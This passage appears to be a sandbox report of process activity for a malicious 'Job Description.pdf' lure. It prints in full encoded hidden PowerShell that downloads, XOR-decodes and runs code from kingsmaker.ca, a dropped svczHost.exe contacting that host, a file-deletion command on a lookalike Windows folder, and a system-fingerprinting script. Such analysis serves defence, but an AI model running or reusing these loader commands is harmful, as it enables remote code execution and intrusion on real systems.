                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:4
                                                                                                                            Start time:02:30:20
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES421C.tmp" "c:\Users\user\AppData\Local\Temp\pkwqtvat\CSC14ED126C80BF4A239EEB93A187C6F14.TMP"
                                                                                                                            Imagebase:0x7ff7c3220000
                                                                                                                            File size:52'744 bytes
                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:5
                                                                                                                            Start time:02:30:33
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:6
                                                                                                                            Start time:02:30:33
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:8
                                                                                                                            Start time:02:30:40
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf"
                                                                                                                            Imagebase:0x7ff686a00000
                                                                                                                            File size:5'641'176 bytes
                                                                                                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:9
                                                                                                                            Start time:02:30:41
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                                            Imagebase:0x7ff60a150000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:10
                                                                                                                            Start time:02:30:41
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:02:30:41
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:12
                                                                                                                            Start time:02:30:41
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:13
                                                                                                                            Start time:02:30:41
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                                            Imagebase:0x7ff6413e0000
                                                                                                                            File size:3'581'912 bytes
                                                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:14
                                                                                                                            Start time:02:30:42
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                                            File size:55'320 bytes
                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:15
                                                                                                                            Start time:02:30:42
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2064 --field-trial-handle=1720,i,11727097951679054640,6860338187584795454,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                            Imagebase:0x7ff6413e0000
                                                                                                                            File size:3'581'912 bytes
                                                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:18
                                                                                                                            Start time:02:30:53
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff6ef0c0000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:20
                                                                                                                            Start time:02:31:32
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\Temp\svczHost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca
                                                                                                                            Imagebase:0x7ff7173e0000
                                                                                                                            File size:8'351'232 bytes
                                                                                                                            MD5 hash:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 67%, ReversingLabs
                                                                                                                            Has exited:false

                                                                                                                            Target ID:21
                                                                                                                            Start time:02:31:32
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:false

                                                                                                                            Target ID:22
                                                                                                                            Start time:02:31:32
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
                                                                                                                            Imagebase:0x7ff60a150000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:23
                                                                                                                            Start time:02:31:35
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                                            Imagebase:0x7ff60a150000
                                                                                                                            File size:289'792 bytes
                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            Target ID:24
                                                                                                                            Start time:02:31:35
                                                                                                                            Start date:29/11/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAE